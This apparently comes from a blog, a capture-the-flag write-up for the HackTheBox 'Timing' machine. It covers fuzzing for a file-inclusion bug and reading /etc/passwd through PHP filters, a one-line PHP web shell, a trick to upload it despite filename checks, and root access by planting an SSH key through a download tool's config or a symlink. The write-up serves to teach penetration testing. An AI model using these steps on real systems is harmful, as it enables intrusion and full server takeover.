HackTheBox-Timing

Timing was a medium rated linux machine which involved fuzzing for files and finding LFI leading us to viewing source code of the application and logging into the admin panel by modifying the role parameter which had a functionality to upload image files only which can be easily by passed by just adding php extension before and through LFI we can read how the application was generating the hash name of the file allowing us to access the upload php file and executing it using php filter which gives us a web shell. In /opt directory an archive can be found which had git commits made giving us the password for aarron user to login through ssh which had permissions to run a custom binary, netutils as the root user.

NMAP

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

On the webserver we can see a login page

I couldn’t find anything else , tried a simple sqli but it didn’t worked , tried admin:admin and that didn't worked as well. Fuzzing for files with gobuster

Running gobuster with php extension

This gives us a file image.php , but on viewing that file it won't return anything as it's a php file so it's going to be executed

I then ran wfuzz to see if I can find any parameters and found img

wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u "http://10.129.245.78/image.php?FUZZ=/etc/passwd" --hw 0

so doing /etc/passwd on this parameter won't give us anything as it's blacklisted

So we can try to use php filters , here I used the decoder just to read the passwd file

Now we can read the php files as well

This was the source code image.php , let's look at login.php

It’s using db_conn.php so maybe it will have credentials

Checking the other php files there was a file named admin_auth_check which is checking if role is set to 1

<?phpinclude_once "auth_check.php";if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
echo "No permission to access this panel!";
header('Location: ./index.php');
die();
}
?>

But we can’t do anything from this point , so moving on ,we got a password from db file but it didn’t worked anywhere , from passwd file we have a user aaron , let's try to login with aaron:aaron

And luckily this worked , now we can see that we can update our profile

So let’s capture this request in burp suite and see what parameters are being set

This is making a POST request to profile_update.php , so let's see the source code through LFI

In the source code it’s taking a POST parameter role and adding it to our php session , we can change it to 1 to become admin

On refreshing the page we can see that we have access to admin panel

Foothold

Looking at the source code of upload.php , it's going to name the uploaded file by calculating md5 hash of a string having $file_hash (not the variable just a string) , concatenated with _ the md5 hash of this string will be calculated and at the end file name with extensions will be concatenated

So I copied the source code and added the filename shell.php.jpg which is the php file I created to bypass the file upload for php extension

<?php
$file_name = md5('$file_hash' . time()) . '_' . 'shell.php.jpg';
echo $file_name."\n";
?>

and the contents of this php file are

<?php
system($_GET['cmd']);
?>

Now we need to synchronize the with the target machine using timedatectl set-timezone UTC

In order to upload the file and know it’s name we need to keep running the php file and upload that file then pass those filenames that we got through the script to gobuster

We started to get hit on our uploaded file so we know the name of the file now

But it won’t execute our php file but remember that there was a php file image.php which had a LFI which was including a file through GET parameter so let's try to include that file with that

I later uploaded phpbash whch is an interactive php web shell

https://github.com/Arrexel/phpbash

Privilege Escalation (aaron)

Going into /opt folder we saw a back of the site in an archive

So let’s try to copy it to web’s root directory (/var/www/html)

Perfect, now we can easily request for this archive

Notice that we have a .git , so let's try to see commit made to this repository using git show

We get a second password, this lets us login as arron user

Privilege Escalation (root)

Doing sudo -l , aaron can run netutils as root user

And this isn’t really a binary , it’s a bash script that runs a jar file

But we can’t actually read it since it’s under /root directory and we don’t have permissions to read it , so on executing it we will have two options that we can use utilize , download file from ftp or from http

I provided the localhost because there’s web service running, result will saved in a file called default in the current directory as root user

We don’t know what it’s running to get this page , for that I uploaded pspy which is a process monitor

This tells us that it runs axel which is a file download accelerator for linux , I tried to look for exploits regarding this but there weren’t any, googling around I found a configuration file for axel which defines what should be the filename when a index page is downloaded

https://github.com/FiloSottile/axel/blob/master/axelrc.example

This part is commented ,so un comment and instead of default we change it to /root/authorized_keys file , it will now download the index.html page in that directory, let's generate a ssh key pair with ssh-keygen and rename our id_rsa.pub to index.html and transfer this config file on to this machine naming it .axelrc

Now logging in with the ssh key as the root user.

Method #2

Other way to get root is to make symlink to /root/.ssh/authorized_keys which is the source and you can name the symlink anything you want but make sure to download the filename as the symlink

ln -s /root/.ssh/authorized_keys/ abc

Now hosting the file using apache or python3 and then just logging with ssh as root user.

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store